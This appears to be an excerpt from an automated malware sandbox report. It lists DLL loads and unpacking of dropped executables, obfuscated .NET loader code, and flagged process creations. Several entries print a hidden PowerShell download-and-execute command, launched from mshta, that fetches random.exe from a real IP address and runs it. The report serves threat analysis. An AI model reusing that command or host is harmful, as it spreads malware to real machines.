Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Section loaded: napinsp.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: tmp945D.tmp.21.dr

LNK file: ..\..\..\..\..\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: random.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: random.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: random.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: random.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: random.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: random.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: random.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.1553984924.00000259EF0A5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdbl source: powershell.exe, 00000009.00000002.1553984924.00000259EF0A5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 6?ll\System.pdb source: powershell.exe, 00000009.00000002.1553984924.00000259EF0A5000.00000004.00000020.00020000.00000000.sdmp

Source: random.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: random.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: random.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: random.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: random.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Unpacked PE file: 11.2.TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.e70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rkvlnuwm:EW;pjfgcgrb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rkvlnuwm:EW;pjfgcgrb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 12.2.skotes.exe.de0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rkvlnuwm:EW;pjfgcgrb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rkvlnuwm:EW;pjfgcgrb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 13.2.skotes.exe.de0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rkvlnuwm:EW;pjfgcgrb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rkvlnuwm:EW;pjfgcgrb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Unpacked PE file: 14.2.TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.e70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rkvlnuwm:EW;pjfgcgrb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rkvlnuwm:EW;pjfgcgrb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Unpacked PE file: 21.2.6d81c0d08d.exe.d10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sfyuxlav:EW;uolmlutr:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Unpacked PE file: 23.2.0a633717d1.exe.d90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ntmjlkyf:EW;izkkdycv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ntmjlkyf:EW;izkkdycv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Unpacked PE file: 25.2.327981c77b.exe.a90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bchkvmmi:EW;wdfozfjw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bchkvmmi:EW;wdfozfjw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Unpacked PE file: 46.2.327981c77b.exe.a90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bchkvmmi:EW;wdfozfjw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bchkvmmi:EW;wdfozfjw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Unpacked PE file: 49.2.TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rkvlnuwm:EW;pjfgcgrb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rkvlnuwm:EW;pjfgcgrb:EW;.taggant:EW;

.NET source code contains method to dynamically call methods (often used by packers)

Source: random[3].exe.18.dr, PjMboxrZKVMRiayL4T.cs	.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 82ab3472d6.exe.18.dr, PjMboxrZKVMRiayL4T.cs	.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: random[3].exe0.18.dr, PjMboxrZKVMRiayL4T.cs	.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 48a23b3144.exe.18.dr, PjMboxrZKVMRiayL4T.cs	.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: random[3].exe.18.dr

Static PE information: 0xDF9E7476 [Fri Nov 19 11:54:30 2088 UTC]

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00CD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00CD42DE

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 6d81c0d08d.exe.18.dr	Static PE information: real checksum: 0x1b446d should be: 0x1ba18e
Source: 82ab3472d6.exe.18.dr	Static PE information: real checksum: 0x0 should be: 0xbb8c2
